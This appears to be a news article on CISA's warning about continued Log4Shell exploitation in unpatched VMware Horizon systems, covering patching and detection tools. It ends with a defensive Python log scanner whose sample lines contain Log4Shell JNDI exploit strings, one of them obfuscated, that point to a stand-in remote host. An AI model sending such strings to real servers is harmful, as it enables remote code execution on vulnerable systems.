Last week, the Cybersecurity and Infrastructure Security Agency (CISA) issued a warning notifying organizations that malicious threat actors are continuing to exploit the zero-day Log4Shell vulnerability in VMware Horizon and Unified Access Gateway (UAG) to obtain initial access to target systems without the necessary patches.
One of the most alarming elements of the report was that CISA recommends all organizations with affected systems that haven’t deployed patches “assume compromise and initiate threat hunting activities.”
Above all, the notice highlights that enterprises who haven’t patched Log4Shell are still at risk, and at the very least need to deploy available patches to their systems, if not take steps to remediate an intrusion.
A look at the history of Log4Shell
Alibaba’s cloud security team first discovered and reported the Log4Shell vulnerability to Apache on November 24th last year.
The researchers initially noticed attackers using an exploit in Apache Log4j 2, an open-source library that logs errors and events within Java applications, to remotely execute malicious code on servers and clients running Minecraft.
While Apache patched the vulnerability on December 9th, Log4Shell had already gained a reputation as a serious zero-day vulnerability that commentators warned would “wreak havoc across the internet for years to come,” with an estimated 3 billion exploitable devices.
As publicity grew over the vulnerability, threat actors began to direct attacks at enterprises across the world, with Microsoft finding an uptick in techniques including mass-scanning, coin mining, establishing remote shells, and red-team activity.
Ever since, the exploit has decreased confidence in third-party cloud software to the point where 95% of IT leaders report that Log4Shell was a major wake-up call for cloud security, and 87% report that they feel less confident about their cloud security now than they did prior to the incident.
Is Log4Shell still a threat today?
While it’s been months since Log4Shell was first discovered and many organizations have deployed the necessary patches to protect their systems, most haven’t. In fact, in April this year, a Rezilion report found that almost 60% of the affected Log4Shell software packages remain unpatched.
CISA’s recent warning highlights that failure to patch these systems could be a costly oversight, given that threat actors are still actively looking for unpatched systems to exploit.
The only way to minimize these zero-day threats is for enterprises to implement an organized patching plan, to ensure that any internet-facing servers are patched and protected.
“Patching is a critical part of any organization’s security plan, and devices connected to the internet while unpatched, especially against a well-known and exploited vulnerability, create a serious risk for the organizations and their customers,” said security awareness advocate with KnowBe4, Erich Kron.
“While patching can be a challenge and can even pose a real risk of an outage if there are problems, any organizations that have internet-facing devices should have a system in place, and testing to reduce the risk significantly,” Kron said.
The security implications of failing to patch log4j
At this stage in the vulnerability’s lifecycle, failure to patch exposed systems is a serious mistake that indicates an organization has significant gaps in its existing security strategy.
“Patches for log4j versions that are vulnerable to Log4Shell have been available since December. This includes patches for VMware products,” said principal security strategist within the Synopsys Cybersecurity Research Center (CyRC), Tim Mackey.
“Unfortunately, organizations that have yet to patch log4j or VMware Horizon lack a robust patch management strategy, be that a commercial or open source strategy, or have instances of shadow deployments,” Mackey said.
Mackey highlights that while using media outreach to encourage organizations to patch new vulnerabilities can be effective, it isn’t a substitute for proactively monitoring for new exploits.
A look at the solutions addressing Log4Shell
While keeping vulnerabilities patched is easier said than done in complex modern network environments, there are a growing number of patch management solutions that organizations can use to push patches to multiple devices remotely and efficiently.
Many organizations are already using patch management solutions to keep their devices updated, with researchers anticipating that the global patch management market will grow from a value of $652 million in 2022 to reach a valuation of $1,084 million by 2027.
For addressing the Log4Shell vulnerability at a more granular level, enterprises can leverage vulnerability scanning tools like PortSwigger BurpSuite Pro, Nmap, and TrendMicro’s Log4J Vulnerability Tester to identify exposed files so they can take action to remediate them.
It’s also worth noting that prominent tech vendors like Microsoft and Google have deployed their own proprietary solutions to help enterprises identify and mitigate Log4j.
For instance, Microsoft expanded Microsoft Defender so that it can scan devices for vulnerable log4j files, and Google Cloud offers Cloud Logging to allow enterprises to query logs for attempts to exploit log4j 2 and to issue alerts when exploit messages are written to logs.
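The log querying described above can be reproduced in-house against existing web or application logs. The following is an added example, not code from the article or from Microsoft or Google: it scans constructed sample access-log lines for Log4j JNDI lookup strings, first collapsing the simple nested lookups (lower/upper/default-value) that are commonly used to hide the literal `${jndi:` pattern from naive string matching.

```python
import re

# Constructed sample access-log lines (not real traffic); the IPs are documentation ranges.
SAMPLE_LOGS = [
    '10.0.0.5 - - [24/Jun/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Jun/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [24/Jun/2022:10:01:09 +0000] "GET /?x=${${lower:j}ndi:rmi://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.3 - - [24/Jun/2022:10:02:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Innermost Log4j lookups that evaluate to a plain string; nesting these splits up the word "jndi".
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${name:-fallback} -> fallback

def normalize(text: str) -> str:
    """Collapse innermost lower/upper/default lookups until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text

_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)

def is_log4shell_attempt(line: str) -> bool:
    """Match on the raw line as well as the normalized one so collapsing cannot hide a hit."""
    return bool(_JNDI.search(line) or _JNDI.search(normalize(line)))

def find_attempts(lines):
    """Return (line_number, source_ip) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if is_log4shell_attempt(line):
            hits.append((number, line.split(" ", 1)[0]))
    return hits

if __name__ == "__main__":
    for number, ip in find_attempts(SAMPLE_LOGS):
        print(f"line {number}: JNDI lookup from {ip}")
```

A hit only shows that an exploit string reached a logged field; whether the host was actually vulnerable depends on the log4j version in use, so hits should feed the threat-hunting step CISA recommends rather than be treated as proof of compromise.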
By combining patch management solutions with proactive vulnerability scanning, organizations can consistently identify vulnerable infrastructure and flaws like log4j before an attacker has a chance to exploit them.